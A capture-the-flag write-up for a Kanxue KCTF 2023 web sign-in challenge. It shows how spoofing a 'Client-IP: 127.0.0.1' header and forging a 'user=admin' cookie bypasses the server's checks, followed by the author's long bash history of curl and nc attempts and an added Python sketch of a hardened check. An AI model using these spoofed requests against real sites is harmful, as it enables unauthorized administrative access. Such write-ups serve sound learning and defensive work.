[Original] Kanxue 2023 KCTF Annual Contest, Sign-in Challenge: 生死较量 (Life-and-Death Struggle)
Posted: 2023-9-1 13:42

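The page hints at two key points: "local" and "administrator"

"Local": bypass with the HTTP header 'Client-IP: 127.0.0.1'
"Administrator": the server response contains 'Set-Cookie: user=guest', so send 'Cookie: user=admin' from the client

Final answer: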

curl -vvv -H 'Client-IP: 127.0.0.1' -H 'Cookie: user=admin' 'http://f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81/'

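The write-up above is for people who know web
.
Attached: an hour and a half of struggle by someone who does not know web (from .bash_history)
(Quite simply the hardest sign-in challenge I have ever done)
.
The journey:
The cookie is easy to spot; F12 shows it right away
(Then stuck for several minutes; by this point the first three bloods had already been taken)
Noticed "local"; with my extremely limited web-challenge experience I thought of X-Forwarded-For, tried it, no effect
(Stuck for another ten-plus minutes)
Found out there are many HTTP headers for bypassing a local-only check, tried them one by one
(Got to Client-IP and the response finally changed, but why did it still say not admin?)
Shut down in despair
(Went off track: saw that php/5.5.9 was a very old version and started frantically trying "PHP Development Server <= 7.4.21 - Remote Source Disclosure")
404; it turned out the target machine shuts down automatically after 1 hour. Restarted and continued (obviously, the host in all later commands changed)
(Saw Apache in the response, knew it was useless)
……
.
Look at the last two commands below: the '-H' before 'Cookie: ...' was missing, which is why it kept saying not admin
.
..
...
The end. So painful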

curl '   -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'   -H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8'   -H 'Cache-Control: max-age=0'   -H 'Connection: keep-alive'   -H 'Cookie: <redundant>; user=admin'   -H 'Referer:    -H 'Upgrade-Insecure-Requests: 1'   -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'   --compressed   --insecure
curl -vvv '
curl -vvv -H 'Cookie: user=admin' '
curl -vvv -H 'Cookie: user=root' '
curl -vvv -H 'Cookie: user=administrator' '
curl -vvv -H 'Cookie: user=admin' '
curl -vvv -H 'Cookie: user=admin' '
curl -vvv -H 'Cookie: user=admin' '
curl -vvv -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'X-Forwarded-For: localhost' -H 'Cookie: user=admin' '
curl -vvv -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'X-Forwarded-For: 127.0.0.1,127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'X-Forwarded-For: 127.0.0.1' http://433bb7e5-d7d7-4f99-9c4c-2051a962d4af.node.kanxue.com:81/'
curl -vvv -H 'X-Forwarded-For: 127.0.0.1' '
curl '   -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'   -H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8'   -H 'Cache-Control: max-age=0'   -H 'Connection: keep-alive'   -H 'Cookie: <redundant>'   -H 'Referer:    -H 'Upgrade-Insecure-Requests: 1'   -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'   --compressed   --insecure
curl ' -H 'X-Forwarded-For: 127.0.0.1'   -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'   -H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8'   -H 'Cache-Control: max-age=0'   -H 'Connection: keep-alive'   -H 'Cookie: <redundant>'   -H 'Referer:    -H 'Upgrade-Insecure-Requests: 1'   -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'   --compressed   --insecure
curl ' -H 'X-Forwarded-For: 127.0.0.1'   -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'   -H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8'   -H 'Cache-Control: max-age=0'   -H 'Connection: keep-alive'   -H 'Cookie: <redundant>'   -H 'Referer:    -H 'Upgrade-Insecure-Requests: 1'   -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'   --compressed   --insecure
curl ' -H 'X-Forwarded-For: 127.0.0.1'   -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'   -H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8'   -H 'Cache-Control: max-age=0'   -H 'Connection: keep-alive'   -H 'Cookie: <redundant>'   -H 'Referer:    -H 'Upgrade-Insecure-Requests: 1'   -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'   --compressed   --insecure
curl -vvv -H 'X-Forwarded-For: 127.0.0.1' '
curl -vvv -H 'X-Forwarded-For: 127.0.0.1,localhost' '
curl -vvv -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'X-Real-IP: 127.0.0.1' -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'X-Forwarded-For-Original: 127.0.0.1' -H 'X-Real-IP: 127.0.0.1' -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'X-Forwarded-Host: 127.0.0.1' -H 'X-Real-IP: 127.0.0.1' -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'X-Remote-IP: 127.0.0.1' -H 'X-Real-IP: 127.0.0.1' -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'X-Client-IP: 127.0.0.1' -H 'X-Real-IP: 127.0.0.1' -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'X-True-Client-IP: 127.0.0.1' -H 'X-Real-IP: 127.0.0.1' -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'X-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'X-Gateway-Host: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'X-Gateway-Host: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'X-Client-IP: 127.0.0.1' -H 'X-Real-IP: 127.0.0.1' -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=root' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user="' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=administrator' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv http://433bb7e5-d7d7-4f99-9c4c-2051a962d4af.node.kanxue.com:81/'
curl -vvv '
curl -vvv http://433bb7e5-d7d7-4f99-9c4c-2051a962d4af.node.kanxue.com:81/'
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;password=test123' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl --path-as-is -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl --path-as-is -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=Administrator' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=localadmin' '
curl -vvv -H 'Client-IP: 127.0.0.1' '
curl '   -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'   -H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8'   -H 'Cache-Control: max-age=0'   -H 'Connection: keep-alive'   -H 'Cookie: <redundant>'   -H 'Referer:    -H 'Upgrade-Insecure-Requests: 1'   -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'   --compressed   --insecure
curl '  -H 'Client-IP: 127.0.0.1'  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'   -H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8'   -H 'Cache-Control: max-age=0'   -H 'Connection: keep-alive'   -H 'Cookie: <redundant>'   -H 'Referer:    -H 'Upgrade-Insecure-Requests: 1'   -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'   --compressed   --insecure
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'X-Forwarded-For: 127.0.0.1' -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -d 'user=admin&pass=test123' -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -d 'user=admin&pass=test123' -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;pass=test123' '
curl -d 'user=admin&pass=test123' -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;pass=test123' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;pass=test123' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;pass=test123' '
echo -ne 'GET / HTTP/1.1\r\nHost: 433bb7e5-d7d7-4f99-9c4c-2051a962d4af.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n' | nc 433bb7e5-d7d7-4f99-9c4c-2051a962d4af.node.kanxue.com 81
echo -ne 'GET / HTTP/1.1\r\nHost: 433bb7e5-d7d7-4f99-9c4c-2051a962d4af.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n'
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;pass=test123' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;pass=test123' 'http://f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81/'
echo -ne 'GET / HTTP/1.1\r\nHost: /f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n' | nc f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com 81
echo -ne 'GET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n' | nc f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com 81
echo -ne 'GET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nClient-IP: 127.0.0.1\r\n\r\n\r\n' | nc f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com 81
echo -ne 'GET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nClient-IP: 127.0.0.1\r\n\r\n\r\n'
echo -ne 'GET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\n' | nc f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com 81
echo -ne 'GET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\n'
echo -ne 'GET /getinfo.php HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\n' | nc f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com 81
echo -ne 'GET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\n'
echo -ne 'GET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n'
echo -ne 'GET /getinfo.php HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n' | nc f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com 81
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;pass=test123' 'http://f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81/'
curl -vvv -H 'Client-IP: 127.0.0.1' -H 'Cookie: user=admin' 'http://f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81/'

Last edited by mb_mgodlfyn on 2023-9-1 13:49, reason:
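
Added example, not part of the original post and not the challenge's actual server code: a sketch of why the final request works and how the check can be made sound. It assumes the server decides "local" from a client-supplied `Client-IP` header and "admin" from a plain `user` cookie; every function name, the `session` cookie and the signing key are hypothetical.

```python
import hashlib
import hmac
import ipaddress

# Constructed demo key; a real deployment would load a random server-side secret.
SECRET = b"constructed-demo-key"


def naive_is_local_admin(peer_ip, headers, cookies):
    """Weak pattern (assumed): both facts are read from the client's own request."""
    claimed_ip = headers.get("Client-IP", peer_ip)  # client-controlled header
    return claimed_ip == "127.0.0.1" and cookies.get("user") == "admin"


def sign(user):
    """HMAC over the user name, so the client cannot mint its own role."""
    return hmac.new(SECRET, user.encode(), hashlib.sha256).hexdigest()


def issue_cookie(user):
    """Value the server would place in Set-Cookie: session=<user>.<mac>."""
    return f"{user}.{sign(user)}"


def verified_user(cookie):
    """Return the user name only if the MAC matches, otherwise None."""
    user, _, mac = cookie.rpartition(".")
    if user and hmac.compare_digest(mac.encode(), sign(user).encode()):
        return user
    return None


def hardened_is_local_admin(peer_ip, headers, cookies):
    """Locality from the TCP peer address only; role from a signed cookie.

    Request headers such as Client-IP or X-Forwarded-For are ignored because
    no trusted reverse proxy is assumed to sit in front of the application.
    """
    try:
        is_local = ipaddress.ip_address(peer_ip).is_loopback
    except ValueError:
        return False
    return is_local and verified_user(cookies.get("session", "")) == "admin"


# Constructed request mirroring the final curl command, sent from a remote peer.
REMOTE_PEER = "203.0.113.7"
SPOOFED_HEADERS = {"Client-IP": "127.0.0.1"}
SPOOFED_COOKIES = {"user": "admin", "session": "admin.forged"}
```

The naive check accepts the constructed remote request, while the hardened check accepts only a loopback peer that presents a cookie the server itself signed.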